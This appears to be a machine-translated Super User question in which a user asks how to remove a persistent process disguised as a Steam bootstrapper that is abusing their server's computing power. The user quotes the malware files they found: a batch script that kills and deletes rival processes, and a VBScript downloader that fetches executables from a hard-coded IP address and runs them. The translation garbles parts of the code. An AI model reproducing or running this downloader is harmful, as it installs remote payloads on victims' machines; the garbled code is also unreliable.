windows - kalıcı buhar istemcisi bootstrapper nasıl öldürülür - Super User

Görev yöneticimde aşağıdaki durum var:

Ne tür bir uygulama olduğunu bilmiyorum, ancak Steam istemcisi bootstrapper'ı kesinlikle kullanmıyorum, çünkü yüklemedim ve aynı zamanda kaldıramıyorum.

Bu adımda nasıl bir uygulama olduğunu anlamaya çalışırsam:

Böyle bir şey görüyorum:

MS Config yardımcı programında secury.exe gibi görünen hiçbir şey bulamadım.

Dosya konumunu açtığımda üç dosya görüyorum:

m.bat, b.exe, 4.vbs.

M.bat'ın içeriği aşağıdadır:

taskkill / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe görev listesi / f / t / im MSASCui.exe görev düzeni / f / t / im SystemSettlngs.exe görev düzeni / f / t / im SystemSetting.exe görev düzeni / f / t / im Process.exe görev düzeni / f / t / im winlnlt.exe görev listesi / f / t / im WindowsUpgrade.exe görev düzeni / f / t / im msdc.exe görev düzeni / f / t / im Fiddlere.exe görev düzeni / f / t / im shovst.exe görev düzeni / f / t / im lqrtqe.exe görev listesi / f / t / im apkls.exe görev düzeni / f / t / im winlog.exe görev düzeni / f / t / im svchosts.exe görev düzeni / f / t / im win1ogins.exe görev düzeni / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe del C: \ Windows \ System32 \ soiuos.exe del C: \ Windows \ Setup \ TrustedInstaller.exe, C: \ ProgramData \ kingsoft.exe ve C: \ ProgramData \ expl0rer.exe ile C: \ ProgramData \ ieplare.exe için C: \ ProgramData \ nssm.exe ile C: \ ProgramData \ MSASCui.exe del C: \ Pro gramData \ C: \ ProgramData \ SystemSettlngs.exe \ 'nin C: \ ProgramData \ Process.exe \' nin C: \ ProgramData \ SystemSetting.exe \ 'nin C: \ ProgramData \ Process.exe \' nin C: \ ProgramData \ winlnlt.exe dosyasının C: \ ProgramData \ WindowsUpgrade.exe 'nin C: \ ProgramData \ msdc.exe C: \ ProgramData \ Fiddlere.exe C: \ ProgramData \ shovst.exe del C: \ ProgramData \ lqrtqe.exe ile C: \ ProgramData \ apkls.exe del C: \ ProgramData \ winlog.exe ile C: \ ProgramData C: \ ProgramData \ win1ogins.exe ve C: \ ProgramData \ shovsts.exe için C: \ ProgramData \ fcty.exe C: \ ProgramData \ pool.exe: C: \ ProgramData \ pool2.exe C: \ ProgramData'nın \ pool3.exe

Ardından 4.vbs:

Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe", 2 Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell"). Çalıştır "C: \ ProgramData \ pool3.exe" CreateObject ( "WScript.Shell"). "Del C: \ ProgramData \ pool3.exe" komutunu çalıştırın

Secury.exe dosyasının sunucumun bilgi işlem gücünü kötüye kullanmasını önlemek için ne yapabilirim?

PS Avast'ı bilgisayarımdan tam olarak kontrol ettim, ancak yanlış bir şey bulamadım.

Exe dosyasının sunucumun bilgi işlem gücünü kötüye kullanmasını önlemek için ne yapabilirim?